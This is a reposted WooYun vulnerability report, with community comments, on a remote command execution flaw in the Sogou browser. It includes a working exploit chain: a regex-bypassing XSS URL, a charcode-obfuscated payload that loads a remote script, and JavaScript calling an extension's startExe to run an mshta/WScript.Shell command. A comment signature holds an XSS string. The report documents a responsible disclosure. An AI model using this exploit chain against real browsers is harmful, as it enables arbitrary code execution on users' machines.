治标不治本:搜狗浏览器继续远程执行任意命令

admin
admin
admin
140559
文章
117
评论
2015年8月18日19:03:50评论428 views字数 219阅读0分43秒阅读模式
摘要

2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-24: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-01-18: 细节向核心白帽子及相关领域专家公开
2015-01-28: 细节向普通白帽子公开
2015-02-07: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

漏洞概要 关注数(68) 关注此漏洞

缺陷编号: WooYun-2014-84110

漏洞标题: 治标不治本:搜狗浏览器继续远程执行任意命令 治标不治本:搜狗浏览器继续远程执行任意命令

相关厂商: 搜狗

漏洞作者: gainover治标不治本:搜狗浏览器继续远程执行任意命令

提交时间: 2014-11-21 14:06

公开时间: 2015-02-19 14:08

漏洞类型: 远程代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程代码执行 浏览器漏洞利用技巧

8人收藏

漏洞详情

披露状态:

2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-24: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-01-18: 细节向核心白帽子及相关领域专家公开
2015-01-28: 细节向普通白帽子公开
2015-02-07: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

20分都不给我,好坏好坏好坏的。
先修复,再确认,修复发布浏览器更新了,但又修不好,哪来的自信给我5分。

修复方案:
请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的漏洞。

详细说明:

1. 更新到最新版本

治标不治本:搜狗浏览器继续远程执行任意命令

2. 搜狗针对上一个漏洞,做了一些修复,最根本的协议跳转限制依然没修复。

A. 针对signin.html的XSS做了如下图所示修复:

治标不治本:搜狗浏览器继续远程执行任意命令

正则看似写的一大串,很复杂,实则: 连限定开始的 ^ 都落掉了,

直接 javascript:alert(1);//http://**.**.**.**/ 就绕过正则了

B. 当顶层的URL不是 se-extension:// 时,扩展API的调用会有限制, 但是当前URL为se-extension://时,依然可以调用扩展API。

因此,我们虽然无法用iframe来进行嵌入调用,但是结合

location.href 和 window.open,依然可以执行命令,代码如下:

首先location.href跳转到 signin.html的XSS页面:

code 区域 
location.href='se-extension://ext-1055834318/signin.html?app=test&code=javascript:document.write("<img src%3D1 onerror%3Deval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,50,44,49,49,49,44,57,57,44,52,55,44,49,49,53,44,49,49,49,44,49,48,51,44,49,49,49,44,49,49,55,44,52,54,44,49,48,54,44,49,49,53,41,43,34,63,34,43,77,97,116,104,46,114,97,110,100,111,109,40,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))>");//http://**.**.**.**/';

执行XSS后,调用sogou.js, sogou.js代码如下:

code 区域 
window.w=parent.window.open("se-extension://ext740107210/html/back.html");
 function load(){
  if(window.w&&window.w.document.getElementById("embed1")){
   clearTimeout(window.xx);
   window.w.document.getElementById("embed1").startExe("mshta javascript:(new/**/ActiveXObject('WScript.Shell').run('calc.exe'));window.moveTo(-1000,-1000);window.close();",function(){console.log(arguments)});
  }
 };
 window.xx=setInterval(function(){load();},100);

利用window.open打开se-extension://ext740107210/html/back.html,然后通过返回的窗口对象,调用document.getElementById("embed1").startExe,即可执行任意命令。

具体效果见漏洞证明

漏洞证明:

访问: http://**.**.**.**/poc/sogouxxx.html

治标不治本:搜狗浏览器继续远程执行任意命令

修复方案:

请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的BUG。

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-11-24 18:48

厂商回复:

您好,感谢支持,我们会尽快修复

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共6人评价):

登陆后才能进行评分

100%

0%

0%

0%

0%

评价

  1. 2014-11-21 14:09 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    2

    低:1分------谢谢关注。滚

  2. 2014-11-21 14:10 | 小小黑 ( 实习白帽子 | Rank:56 漏洞数:8 | ...)

    1

    打脸呢这是?

  3. 2014-11-21 14:11 | chopper ( 普通白帽子 | Rank:160 漏洞数:35 | 菜鸟求学,多多关照~)

    1

    厂商见到你就怕了,又要加班了。

  4. 2014-11-21 14:12 | 紫衣大侠 ( 普通白帽子 | Rank:296 漏洞数:30 | 打杂的~~)

    1

    啪啪啪~~

  5. 2014-11-21 14:14 | ghy459 ( 实习白帽子 | Rank:75 漏洞数:7 | 深挖洞,广积shell。)

    1

    搜狗要把二哥列入黑名单了哈哈哈

  6. 2014-11-21 14:21 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了,跪着也要...)

    1

    二哥浏览器专场

  7. 2014-11-21 14:22 | ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子, 但是除了他华...)

    1

    我抢劫你什么,我是抢劫的人吗?臭不要脸还在笑,发生关系还在笑。大老远的把我骗过来,把我玩了,20分都不给我,没见过这么恶心的人

  8. 2014-11-21 14:31 | 大亮 ( 普通白帽子 | Rank:386 漏洞数:73 | 小段子手)

    1

    二哥很生气,后果很严重啊

  9. 2014-11-21 14:47 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )

    1

    一发不可收拾啊 我赌还是5分

  10. 2014-11-21 15:00 | 子非海绵宝宝 治标不治本:搜狗浏览器继续远程执行任意命令 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    二哥说了 不给20整死

  11. 2014-11-21 15:03 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    1

    20分都不给我,好坏好坏好坏的

  12. 2014-11-21 15:18 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    1

    二哥说了,要么20要加班加死你们

  13. 2014-11-21 15:19 | niliu 治标不治本:搜狗浏览器继续远程执行任意命令 ( 核心白帽子 | Rank:1803 漏洞数:235 | 逆流而上)

    1

    哈哈哈 2哥 20哥

  14. 2014-11-21 15:19 | 小威 ( 普通白帽子 | Rank:535 漏洞数:87 | 活到老,学到老!)

    2

    我不认识你,所以给你5分!

  15. 2014-11-21 15:21 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    2

    我来看看给几分

  16. 2014-11-21 15:35 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    修补后,忽略。谢谢关注,未能成功复现。

  17. 2014-11-21 16:02 | 小熊饼干 ( 实习白帽子 | Rank:41 漏洞数:6 | 酱油专业户)

    1

    哈哈,最爱二哥的漏洞,“整天就知道“欢迎来SGSRC平台提交漏洞” 哈哈 这是拿漏洞冲指标呢

  18. 2014-11-21 16:12 | zeracker 治标不治本:搜狗浏览器继续远程执行任意命令 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

    1

    期待厂商的回复啊

  19. 2014-11-21 17:22 | 伟大娃娃 ( 普通白帽子 | Rank:130 漏洞数:10 | 改变世界)

    2

    你骗我,你说在家写毕业PPT的~

  20. 2014-11-21 17:25 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    1

    打脸成功,啪啪

  21. 2014-11-21 17:29 | only_guest 治标不治本:搜狗浏览器继续远程执行任意命令 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术. PKAV已经暂停...)

    2

    你骗我,你说在家写毕业PPT的~

  22. 2014-11-21 20:39 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~ 此号为虚拟小号,并不存在实体...)

    1

    @only_guest @伟大娃娃 写毕业PPT是吃零食,找漏洞是生活 ---华丽的小尾巴---我不是二哥---

  23. 2014-11-21 21:26 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    1

    就是给你五分 咋滴

  24. 2014-11-23 01:04 | LaiX ( 普通白帽子 | Rank:130 漏洞数:40 | SAINTSEC)

    1

    二哥,这一发不可收拾

  25. 2014-11-24 19:07 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    1

    2哥,他们家的回复终于改了。

  26. 2014-11-24 19:20 | xsser 治标不治本:搜狗浏览器继续远程执行任意命令 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    1

    8分好啊 8分吉利

  27. 2014-11-24 19:55 | gainover 治标不治本:搜狗浏览器继续远程执行任意命令 ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    1

    @xsser =。= 还是拿小号发搜狗的好了,简直是拉低我rank平均值。

  28. 2014-11-24 20:36 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @gainover 8分。。。搜狗这档次要求是有多高啊!拉低rank平均值,人人网今天给了我2个1rank,妹的。。

  29. 2014-11-24 21:05 | p.z 治标不治本:搜狗浏览器继续远程执行任意命令 ( 普通白帽子 | Rank:411 漏洞数:40 )

    1

    我觉得应该是这样 5 8 10 11 11 10 8 5

  30. 2014-11-24 21:24 | F0rm ( 路人 | Rank:0 漏洞数:2 | )

    1

    8——发

  31. 2014-11-24 22:39 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @p.z 我觉得应该是5 8 6 1 1

  32. 2014-11-28 17:06 | noob ( 实习白帽子 | Rank:85 漏洞数:19 | 向各位大神学习,向各位大神致敬)

    1

    @魇 100块,拿去

  33. 2014-12-02 17:10 | darkrerror 治标不治本:搜狗浏览器继续远程执行任意命令 ( 普通白帽子 | Rank:337 漏洞数:53 | 学习)

    2

    @魇 小伙很摩登啊

  34. 2014-12-15 09:13 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    1

    请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的BUG。 您好,感谢支持,我们会尽快修复

  35. 2015-02-19 17:50 | 感染者 ( 路人 | Rank:19 漏洞数:17 | 喜欢探索,愿与君共勉!)

    0

    8有点低了啊……

  36. 2015-02-19 18:27 | 静默 ( 路人 | Rank:9 漏洞数:7 | 安全小白)

    0

    好坑爹的厂商啊,命令执行才给8

  37. 2016-02-20 17:25 | 昌维 ( 路人 | Rank:15 漏洞数:4 | QQ:867597730,百度贴吧ID:昌维001 个人...)

    1

    请洞主修复“修复方案”中每次都自动回复“请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的BUG。”的BUG。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin